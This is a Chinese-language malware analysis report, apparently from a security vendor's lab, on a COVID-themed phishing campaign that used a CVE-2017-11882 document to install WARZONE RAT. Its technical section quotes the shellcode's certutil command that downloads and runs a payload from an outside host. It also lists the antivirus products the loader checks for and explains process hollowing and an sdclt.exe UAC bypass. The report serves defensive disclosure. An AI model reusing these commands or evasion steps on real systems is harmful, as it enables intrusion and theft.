伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

綠盟科技發表於2020-03-30

概述

近日，綠盟科技伏影實驗室再次發現一起黑客利用新冠疫情實施釣魚郵件攻擊的案例，此次案例的攻擊目標為一家位於台灣的POS解決方案提供商。

黑客偽造成美國疾病預防與控制中心傳送郵件，實則是通過AOL郵箱傳送釣魚郵件。早在2011年，AOL郵箱就有被報導傳送釣魚郵件的事件。2014年，郵件伺服器被黑客攻擊，用來傳送釣魚郵件和傳播釣魚網站，後又被勒索軟體使用作為聯絡郵箱。

此次釣魚郵件內容和附件名稱也與疫情相關，通過郵件內容誘導使用者開啟並檢視附件文件《COVID-19 - nCoV - Special Update.doc》。開啟的文件沒有任何內容顯示，看似無害，但是實際上包含了CVE-2017-11882的漏洞利用。當收件人開啟文件，便會觸發漏洞利用。一旦漏洞成功利用，便會下載並啟動第一階段攻擊載荷，通過多次資原始檔解密之後執行最終的商業化遠控木馬WARZONE RAT。

WARZONE RAT是一款功能完善的商業化遠控木馬軟體，有多次進行攻擊活動的記錄。相關資訊顯示，WARZONE RAT相關的廣告資訊最早於2018年出現在 warzone[.]io，目前仍在warzone[.]pw網站提供銷售服務。Warzone RAT木馬具備比較完整的遠控功能，在後面技術分析部分會進行介紹。WARZONE RAT因為木馬檔案中存在字串AVE_MARIA，又被安全廠商識別為Ave Maria。

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

2018年12月底，Ave Maria惡意軟體對義大利某能源企業發起網路釣魚攻擊。黑客以供應商銷售部的名義發出釣魚郵件，附帶了包含CVE-2017-11882漏洞利用的Excel檔案，以執行從惡意網站下載的木馬程式。

2019年2月，WARZONE RAT又發生一起疑似針對西班牙語地區的政府機構及能源企業等部門的定向攻擊活動。黑客以應聘者的身份傳送誘餌文件，文件以簡歷更新的標題為誘餌，對目標人力資源部門進行定向攻擊，誘使相關人員執行惡意程式碼，從而控制目標人員機器，從事間諜活動。

2019年11月，研究人員發現思科重定向漏洞被利用，攻擊者使用開放重定向漏洞，使得合法站點允許未經授權的使用者在該站點上建立URL地址，從而使訪問者通過該站點重定向到另外一個站點。黑客將垃圾郵件偽裝成WebEx的會議邀請郵件，將其中連結重定向到WARZONE RAT木馬下載連結。一旦執行該木馬，受害者的PC將被黑客完全控制。

攻擊流程

本次事件目標郵箱地址在目標企業官網的contact us部分可以找到，黑客可能是通過訪問企業官網確定目標的郵箱地址電話號碼等資訊。然後偽造發件人向目標郵箱傳送釣魚郵件，誘導收件人檢視郵件中帶有漏洞利用的郵件附件文件，一旦漏洞成功利用，黑客最終將控制目標PC。

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

當收件人開啟郵件附件文件的時候，會觸發漏洞利用下載第一階段攻擊載荷，然後通過多次解密後獲得並執行第二階段第三階段攻擊載荷，第三階段攻擊載荷便是WARZONE RAT，最終連線C&C服務端等待指令。

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

技術分析

DOC文件漏洞利用

郵件附件惡意樣本文件被命名為《COVID-19 - nCoV - Special Update.doc》，利用漏洞CVE-2017-11882執行shellcode:

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

shellcode通過WinExec執行命令"CmD /C cErTuTiL -uRlCAchE -sPlIT –f http://getegroup.com/file.exe %TMP%\\1.exe&start %TMP%\\1.exe"。

使用CertUtil.exe下載並啟動第一階段攻擊載荷1.exe。CertUtil.exe是Windows的內建程式，用於在Windows中管理證書，使用該程式可以在Windows中安裝，備份，刪除，管理和執行與證書和證書儲存相關的各種功能。另外，CertUtil能夠從遠端URL下載證書或任何其他檔案。

第一階段攻擊載荷

第一階段攻擊載荷是一個C#編寫的程式，程式碼經過高度混淆。執行過程中通過解密資原始檔CK，在記憶體裡面獲得第二階段攻擊載荷DEBFyo.dll，通過Assembly.load 載入第二階段攻擊載荷並呼叫X()方法。

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

Re.RA.m('ÿ',1,null,510733617)=“X”

第二階段攻擊載荷

第二階段攻擊載荷DEBFyo.dll同樣是一個C#編寫並經過高度混淆的PE檔案，檔案包含三個資原始檔。第二階段攻擊載荷的功能主要是分別解密這三個資原始檔生成第三階段攻擊載荷，並按照執行流程進行呼叫。

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

第三階段攻擊載荷

第三階段攻擊載荷的三個PE檔案：

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

按照執行流程第一個LOL.dll功能主要是通過查詢WMI資料，檢查系統版本和AV產品，並在啟動目錄下建立指向第一階段攻擊載荷的快捷方式Adobe_Process.exe.lnk

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

其餘兩個檔案一個就是最終的木馬程式WARZONE RAT，另外一個26.dll在功能上更像是一個載入模組，負責載入執行木馬程式。

第二階段攻擊載荷在啟動載入模組的時候，會將木馬程式的二進位制記憶體資料作為引數傳入。載入模組在執行過程中，首先會對當前系統環境中的AV產品和作業系統進行檢查。

· Directory.Exists

C:\Program Files\AVAST Software

C:\Program Files (x86)\AVAST Software

· Process.GetProcessesByName

BullGuard， a2guard，drweb，vsserv，AVGUI，bdagent，odscanui，bdredline

· detectwd

SELECT Caption FROM Win32_OperatingSystem

檢查過後，便是比較重要的部分，載入模組會以掛起狀態啟動第一階段攻擊載荷，生成一個新程式。然後將WARZONE RAT木馬按照記憶體對齊寫入到這個新程式0x400000開始的地址空間，實現了木馬程式程式映像檔案的載入，然後通過SetThreadContext和ResumeThread執行WARZONE RAT木馬。

通過SetThreadContext設定指令地址：

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

WARZONE RAT

WARZONE RAT是一款通過C++實現的商業遠控木馬程式，相容所有的Windows版本，功能非常完善，執行後可以實現對植入機器的完全控制。WARZONE RAT功能主要包括：

· 遠端桌面

· 隱藏的遠端桌面-HRDP

· 特權提升-UAC繞過

· 遠端網路攝像頭

· 竊取密碼-支援流行的瀏覽器和電子郵件客戶端（ Chrome, Firefox, Internet Explorer, Edge, Outlook, Thunderbird, Foxmail）

· 檔案管理功能-高速的檔案上傳下載，支援檔案執行和刪除

· 實時和離線的鍵盤記錄

· 反向代理

· 自動任務

· 批量管理

· 智慧更新

· Windows Defender繞過

WARZONE RAT銷售網站上，提供了WARZONE RAT的高階版本WARZONE POISON, 在包含了WARZONE RAT的全功能同時，增加了隱藏程式、隱藏檔案、隱藏啟動項、瀏覽器和遠端會話劫持等功能。同時，還提供DOC和EXCEL exploit的定製服務。

WARZONE RAT因為木馬檔案中存在字串AVE_MARIA，又被安全廠商識別為Ave Maria。

木馬功能分析

連線C&C,傳送並接收資料：

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

木馬傳輸的資料使用了RC4加密演算法加密，金鑰為“warzone160"：

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

下載並執行檔案功能：

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

設定開啟遠端桌面：

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

特權提升針對不同版本的作業系統使用不同的方法：

1. 通過新增Windows Defender排除項提升許可權

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊

2. 通過sdclt.exe提權，當 sdclt.exe 被標準使用者許可權的程式呼叫，它會以更高許可權執行另一個程式 sdclt.exe。高許可權的 sdclt.exe 程式會呼叫 C:\Windows\System32\control.exe，而control.exe 程式會以更高許可權執行，並嘗試開啟 HKCU\Software\Classes\Folder\shell\open\command 登錄檔值。

伏影實驗室再次發現黑客利用新冠疫情實施釣魚郵件攻擊